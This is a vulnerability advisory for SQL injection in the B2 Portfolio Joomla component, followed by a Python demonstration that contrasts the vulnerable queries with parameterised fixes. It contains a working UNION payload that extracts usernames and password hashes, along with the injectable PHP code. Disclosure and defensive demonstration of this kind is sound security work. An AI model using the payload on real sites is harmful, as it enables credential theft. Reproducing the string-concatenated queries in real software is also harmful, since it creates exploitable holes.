B2 Portfolio Joomla Component 1.0.0 Multiple SQL Injection Vulnerability
Name              B2 Portfolio
Vendor            http://www.pulseextensions.com
Versions Affected 1.0.0
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2011-01-24
X. INDEX
I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
I. ABOUT THE APPLICATION
________________________
B2 Portfolio is a Joomla component that gives the user the
option to view details of a portfolio item by zooming it
on hover, and to allow a full view by clicking.
II. DESCRIPTION
_______________
Some parameters are not properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple SQL Injection
A) Multiple SQL Injection
_________________________
The category id (taken from the c request parameter in
getcategoryname) and the wallid parameter (read directly
from $_GET in click) are not properly sanitised before
being concatenated into SQL queries. Neither value is cast
to an integer or quoted, so this can be exploited to
manipulate the queries by injecting arbitrary SQL code: a
UNION in the SELECT of getcategoryname, or an altered WHERE
clause in the UPDATE of click.
The following are the vulnerable functions:
function getcategoryname() {
    $db =& JFactory::getDBO();
    $default_category = JRequest::getVar('c', 0);
    if ($default_category == "") {
        $query_cat = 'SELECT default_category FROM #__b2portfolio_config';
        $db->setQuery($query_cat);
        $default_category = $db->loadResult();
    }
    // $default_category comes straight from the request and is
    // concatenated into the query without a cast or quoting
    $query = 'SELECT * FROM #__b2portfolio_category where id=' . $default_category;
    $db->setQuery($query);
    $cat_data = $this->_db->loadObject($query);
    return $cat_data;
}

function click() {
    $db =& JFactory::getDBO();
    $date =& JFactory::getDate();
    $trackDate = $date->toFormat('%Y-%m-%d');
    // wallid is read directly from $_GET, bypassing JRequest entirely,
    // and concatenated into the UPDATE without a cast or quoting
    $query = 'UPDATE #__b2portfolio set click = ( click + 1 ) where id =' . $_GET['wallid'];
    $db->setQuery($query);
    $db->query();
}
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users

The payload assumes the #__b2portfolio_category table has five
columns (the UNION must match the column count of SELECT *) and
the default jos_ table prefix; 0x34 is the ASCII character '4',
used only as a separator between username and password hash in
the returned row.
V. FIX
______
No fix.
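The following is an added example, not code from the advisory or from the B2 Portfolio component, that models the two vulnerable concatenations above in Python on an in-memory SQLite database and places a hardened version beside each. The schema, row contents and table prefix (jos_) are constructed for the example; the category table is given the five columns the advisory's payload assumes. MySQL's concat(username,0x34,password) is rewritten with SQLite's || operator so the payload runs on the standard library, and the integer whitelist in as_int stands in for what a JRequest::getInt() call or an (int) cast plus a bound parameter would do in the component itself.

```python
import re
import sqlite3

# Constructed sample schema (not from the advisory). The category table has
# the five columns the UNION payload (1, concat(...), 3, 4, 5) assumes, and the
# tables use the default "jos_" prefix that the payload's FROM jos_users relies on.
SCHEMA = """
CREATE TABLE jos_b2portfolio_category (
    id INTEGER, name TEXT, description TEXT, ordering INTEGER, published INTEGER);
CREATE TABLE jos_b2portfolio (id INTEGER, title TEXT, click INTEGER);
CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
INSERT INTO jos_b2portfolio_category VALUES (1, 'Web', 'Web projects', 1, 1);
INSERT INTO jos_b2portfolio VALUES (7, 'Item seven', 0);
INSERT INTO jos_b2portfolio VALUES (8, 'Item eight', 0);
INSERT INTO jos_users VALUES (62, 'admin', '0123456789abcdef:salt');
"""

# The advisory's c= payload, with MySQL concat(username,0x34,password) rewritten
# as username||':'||password so SQLite accepts it. Constructed wallid payload
# below turns the single-row UPDATE into an all-rows UPDATE.
CATEGORY_PAYLOAD = "-1 UNION SELECT 1,username||':'||password,3,4,5 FROM jos_users"
WALLID_PAYLOAD = "0 OR 1=1"


def connect():
    """Fresh in-memory database loaded with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def getcategoryname_vulnerable(db, c):
    """Models getcategoryname(): the request value is concatenated verbatim."""
    query = "SELECT * FROM jos_b2portfolio_category where id=" + str(c)
    return db.execute(query).fetchone()


def click_vulnerable(db, wallid):
    """Models click(): wallid is concatenated verbatim. Returns rows changed."""
    query = "UPDATE jos_b2portfolio set click = ( click + 1 ) where id =" + str(wallid)
    return db.execute(query).rowcount


def as_int(value, default=0):
    """Whitelist an integer id; anything else falls back to the default.

    Stricter than PHP's (int) cast, which would keep the leading digits of
    '0 OR 1=1'; either approach removes the injected SQL from the query.
    """
    return int(value) if re.fullmatch(r"-?\d+", str(value).strip()) else default


def getcategoryname_fixed(db, c):
    """Hardened form: integer-cast input bound as a query parameter."""
    return db.execute(
        "SELECT * FROM jos_b2portfolio_category WHERE id = ?", (as_int(c),)
    ).fetchone()


def click_fixed(db, wallid):
    """Hardened form of click(): same whitelist plus a bound parameter."""
    return db.execute(
        "UPDATE jos_b2portfolio SET click = click + 1 WHERE id = ?", (as_int(wallid),)
    ).rowcount


if __name__ == "__main__":
    db = connect()
    print(getcategoryname_vulnerable(db, CATEGORY_PAYLOAD))  # row leaking admin:hash
    print(getcategoryname_fixed(db, CATEGORY_PAYLOAD))       # None
    print(click_vulnerable(db, WALLID_PAYLOAD))              # 2 (every row bumped)
    print(click_fixed(db, WALLID_PAYLOAD))                   # 0
```

The vulnerable SELECT returns the users row in place of a category because the UNION's second column carries username and password hash; the vulnerable UPDATE touches every portfolio row because the injected OR makes the WHERE clause always true. With the integer whitelist and a bound parameter, the same inputs either hit no row or are rejected outright, which is the behaviour the component should have had for both c and wallid.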